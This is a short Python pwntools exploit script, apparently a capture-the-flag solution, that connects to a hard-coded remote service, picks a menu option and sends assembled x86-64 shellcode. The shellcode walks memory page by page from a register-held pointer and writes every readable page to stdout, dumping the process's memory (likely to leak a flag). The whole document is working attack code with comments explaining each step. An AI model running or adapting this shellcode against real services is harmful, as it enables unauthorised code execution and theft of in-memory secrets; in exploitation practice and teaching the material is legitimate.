#!/usr/bin/python3
from pwn import *
# Load the target ELF so pwntools takes its architecture from the binary; asm()
# below relies on context.arch being set here. The file is expected in the
# current directory, and the checksec report is suppressed.
context.binary = target = ELF("./ihnsaims", checksec=False)
# Local variant kept for reference: runs the binary with a placeholder argument
# through a shell. Unused while the remote() line below is active.
# r = process("./ihnsaims flag{fake_flag}", shell=True)
# Remote endpoint is hard-coded (host and port as given on the page). No timeout
# or error handling: an unreachable service surfaces as a pwntools exception.
r = remote("54.85.45.101", 8002)
# Helper: block until the service prints a prompt line ending in "!" and then
# send `a`. Every send in this script is prompt-synchronised through it.
s = lambda a: r.sendafter(b"!\n", a)
# Menu selection. "1" is presumably the option that accepts and executes the
# payload sent next — confirm against the service's prompt text.
s(b"1")
# x86-64 assembly, assembled by pwntools with the arch taken from context.binary.
# What the instructions do, as written:
#   - r12 is initialised from rdx; this assumes rdx holds a usable pointer
#     at the moment the payload starts — TODO confirm against the binary.
#   - label a: advance r12 by one 0x1000-byte page, then issue
#     write(1, r12, 0x1000) (rax=1 is SYS_write on x86-64, rdi=1 is stdout).
#   - cmp rax, -14: -14 is -EFAULT, meaning the page at r12 was not readable;
#     in that case loop back to a and try the next page.
#   - `jne b` is redundant: execution falls through to label b anyway.
#   - label b: exit_group(0) (rax=231 is SYS_exit_group on x86-64, rdi=0).
# The string is passed to asm() verbatim, so any edit here changes the payload;
# keep explanatory notes outside the literal.
sc = """
lea r12, [rdx]
a:
lea r12, [r12+0x1000]
mov rdi, 1
mov rsi, r12
mov rdx, 0x1000
mov rax, 1
syscall
cmp rax, -14
je a
jne b
b:
xor rdi, rdi
mov rax, 231
syscall
"""
# Assemble to raw bytes; the same name is reused for the encoded form.
sc = asm(sc)
# Send the assembled bytes after the next prompt, then hand the socket to the
# user so whatever the service writes back can be read interactively.
s(sc)
r.interactive()